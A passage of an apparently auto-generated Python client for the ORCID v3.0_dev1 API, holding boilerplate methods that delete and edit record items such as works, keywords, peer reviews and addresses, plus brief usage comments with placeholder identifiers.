# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_funding(self, orcid, put_code, **kwargs):
"""
Delete a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_funding(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_funding_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_funding_with_http_info(orcid, put_code, **kwargs)
return data
def delete_funding_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_funding_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_funding" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_funding`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_funding`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
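        # A Content-Type header is set here even though this DELETE sends no
        # body; the other delete endpoints omit it, and it has no effect on
        # the request.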
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_group_id_record(self, put_code, **kwargs):
"""
Delete a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_id_record(put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_group_id_record_with_http_info(put_code, **kwargs)
else:
(data) = self.delete_group_id_record_with_http_info(put_code, **kwargs)
return data
def delete_group_id_record_with_http_info(self, put_code, **kwargs):
"""
Delete a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_id_record_with_http_info(put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group_id_record" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_group_id_record`")
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_keyword(self, orcid, put_code, **kwargs):
"""
Delete keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_keyword(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_keyword_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_keyword_with_http_info(orcid, put_code, **kwargs)
return data
def delete_keyword_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_keyword_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_keyword" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_keyword`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_keyword`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_other_name(self, orcid, put_code, **kwargs):
"""
Delete other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_other_name(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_other_name_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_other_name_with_http_info(orcid, put_code, **kwargs)
return data
def delete_other_name_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_other_name_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_other_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_other_name`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_other_name`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
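
    # Illustrative sketch (not part of the generated client): with `api` an
    # authenticated instance of this class, an "other name" entry could be
    # removed by its put code, e.g.
    #
    #   api.delete_other_name('0000-0002-1825-0097', '12345')
    #
    # Both arguments here are placeholder sandbox values.
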
def delete_peer_review(self, orcid, put_code, **kwargs):
"""
Delete a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.delete_peer_review(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_peer_review_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_peer_review_with_http_info(orcid, put_code, **kwargs)
return data
def delete_peer_review_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.delete_peer_review_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_peer_review" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_peer_review`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_peer_review`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
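
    # Hedged usage example: assuming `api` is configured with a token carrying
    # update scope, a peer review identified by a placeholder put code might be
    # deleted like so:
    #
    #   api.delete_peer_review('0000-0002-1825-0097', '9876')
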
def delete_researcher_url(self, orcid, put_code, **kwargs):
"""
        Delete one researcher URL from an ORCID ID
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.delete_researcher_url(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_researcher_url_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_researcher_url_with_http_info(orcid, put_code, **kwargs)
return data
def delete_researcher_url_with_http_info(self, orcid, put_code, **kwargs):
"""
        Delete one researcher URL from an ORCID ID
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.delete_researcher_url_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_researcher_url" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_researcher_url`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_researcher_url`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
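
    # A minimal sketch, assuming `api` is an authenticated client instance and
    # the put code was obtained from a prior read of the researcher-urls
    # section (both values below are placeholders):
    #
    #   api.delete_researcher_url('0000-0002-1825-0097', '4321')
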
def delete_work(self, orcid, put_code, **kwargs):
"""
Delete a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.delete_work(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_work_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_work_with_http_info(orcid, put_code, **kwargs)
return data
def delete_work_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.delete_work_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_work" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_work`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_work`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
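
    # Illustrative only (placeholder values): a work can be removed
    # synchronously, or asynchronously by supplying a callback, e.g.
    #
    #   api.delete_work('0000-0002-1825-0097', '123456')
    #   thread = api.delete_work('0000-0002-1825-0097', '123456',
    #                            callback=callback_function)
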
def edit_address(self, orcid, put_code, **kwargs):
"""
Edit an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_address(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Address body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_address_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_address_with_http_info(orcid, put_code, **kwargs)
return data
def edit_address_with_http_info(self, orcid, put_code, **kwargs):
"""
Edit an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_address_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Address body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_address`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_address`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
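
    # Hedged sketch: the PUT body is an Address model from the models module
    # generated alongside this client; the identifiers are placeholders.
    #
    #   address = ...  # an Address instance carrying the updated fields
    #   api.edit_address('0000-0002-1825-0097', '55', body=address)
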
def edit_external_identifier_json(self, orcid, put_code, **kwargs):
"""
Edit external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_external_identifier_json(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param PersonExternalIdentifier body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_external_identifier_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_external_identifier_json_with_http_info(orcid, put_code, **kwargs)
return data
def edit_external_identifier_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Edit external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_external_identifier_json_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param PersonExternalIdentifier body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_external_identifier_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_external_identifier_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_external_identifier_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
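
    # Illustrative call, assuming `ext_id` is a PersonExternalIdentifier model
    # carrying the revised values (all identifiers here are placeholders):
    #
    #   api.edit_external_identifier_json('0000-0002-1825-0097', '7',
    #                                     body=ext_id)
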
def edit_keyword_json(self, orcid, put_code, **kwargs):
"""
Edit keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_keyword_json(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Keyword body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_keyword_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_keyword_json_with_http_info(orcid, put_code, **kwargs)
return data
def edit_keyword_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Edit keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_keyword_json_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Keyword body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_keyword_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_keyword_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_keyword_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
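
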